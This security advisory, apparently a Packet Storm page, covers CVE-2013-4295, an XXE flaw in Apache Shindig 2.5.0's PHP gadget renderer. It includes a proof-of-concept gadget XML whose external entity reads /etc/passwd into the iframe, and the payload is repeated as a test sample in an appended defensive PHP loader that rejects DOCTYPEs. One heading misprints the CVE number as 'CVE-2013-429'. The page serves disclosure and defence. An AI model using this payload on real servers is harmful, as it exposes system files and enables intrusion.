Apache Shindig 2.5.0 XXE Injection

Published: 22 Oct 2013 00:00:00. Reported by Kousuke Ebihara. Type: packetstorm. Source: packetstormsecurity.com

Apache Shindig 2.5.0 XXE Injection CVE-2013-429

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Circl | CVE-2013-4295 | 21 Oct 2013 00:00 | circl |
| CVE | CVE-2013-4295 | 24 Oct 2013 01:00 | cve |
| Cvelist | CVE-2013-4295 | 24 Oct 2013 01:00 | cvelist |
| Github Security Blog | Apache Shindig PHP Sensitive Information Disclosure | 17 May 2022 04:59 | github |
| NVD | CVE-2013-4295 | 24 Oct 2013 03:48 | nvd |
| OSV | GHSA-6JVW-RPW4-GJ4X Apache Shindig PHP Sensitive Information Disclosure | 17 May 2022 04:59 | osv |
| Prion | Xxe | 24 Oct 2013 03:48 | prion |
| RedhatCVE | CVE-2013-4295 | 22 May 2025 03:33 | redhatcve |
| securityvulns | [CVE-2013-4295] Apache Shindig information disclosure vulnerability | 28 Oct 2013 00:00 | securityvulns |
| securityvulns | Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl) | 28 Oct 2013 00:00 | securityvulns |
CVE-2013-4295: XXE vulnerability in Apache Shindig 2.5.0 (PHP)

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected: Apache Shindig PHP 2.5.0

Description: The gadget renderer in the PHP version of Apache Shindig is subject to an XML External Entity (XXE) Injection attack. The vulnerability allows a malicious gadget author to construct paths to content on the gadget rendering server, which in turn will display the content in the gadget iframe.

Mitigation: 2.5.0 users should upgrade to 2.5.0-update1.

Example: The following gadget XML demonstrates the issue.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>
<Module>
  <ModulePrefs title="Test Application">
    <Require feature="opensocial-0.9" />
  </ModulePrefs>
  <Content type="html">
    &passwd; hello
  </Content>
</Module>
```

After rendering this gadget you will see the content of /etc/passwd in the gadget iframe.

Credit: This issue was discovered by Kousuke Ebihara.

References: http://shindig.apache.org/security.html
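As an added example (not Shindig's own code, and not the fix the project shipped in 2.5.0-update1), the following PHP shows how a gadget-spec loader can refuse the DOCTYPE that the advisory's gadget depends on and never resolve external entities, so the gadget is rejected instead of having `&passwd;` expanded into the iframe. The two gadget documents are constructed samples and `loadGadgetSpec` is a hypothetical name.

```php
<?php
// Constructed sample: the advisory's proof-of-concept gadget.
const MALICIOUS_GADGET = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Module [ <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>
<Module>
  <ModulePrefs title="Test Application"/>
  <Content type="html">&passwd; hello</Content>
</Module>
XML;

// Constructed sample: a benign gadget, same structure, no DOCTYPE.
const BENIGN_GADGET = <<<'XML'
<?xml version="1.0" encoding="UTF-8"?>
<Module>
  <ModulePrefs title="Hello"/>
  <Content type="html">hello</Content>
</Module>
XML;

function loadGadgetSpec(string $xml): DOMDocument
{
    libxml_use_internal_errors(true); // collect libxml errors, no PHP warnings
    // If libxml ever asks for an external resource (DTD or entity), refuse it
    // instead of reading a local file or fetching a URL.
    libxml_set_external_entity_loader(static function ($public, $system, $ctx) {
        return null;
    });
    $dom = new DOMDocument();
    // No LIBXML_NOENT: entity references stay unexpanded.
    // LIBXML_NONET: no network access while parsing.
    if ($dom->loadXML($xml, LIBXML_NONET) === false) {
        throw new InvalidArgumentException('gadget spec is not well-formed XML');
    }
    // The DTD is the only place an external entity can be declared, and a
    // gadget spec has no legitimate use for one: reject any DOCTYPE outright.
    if ($dom->doctype !== null) {
        throw new InvalidArgumentException('gadget spec declares a DOCTYPE; refusing to render');
    }
    return $dom;
}

foreach ([MALICIOUS_GADGET, BENIGN_GADGET] as $spec) {
    try {
        echo 'accepted: ', loadGadgetSpec($spec)->documentElement->nodeName, "\n";
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

Run with any PHP build that has the dom and libxml extensions; the first spec is rejected before anything reaches the renderer and the second is accepted.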
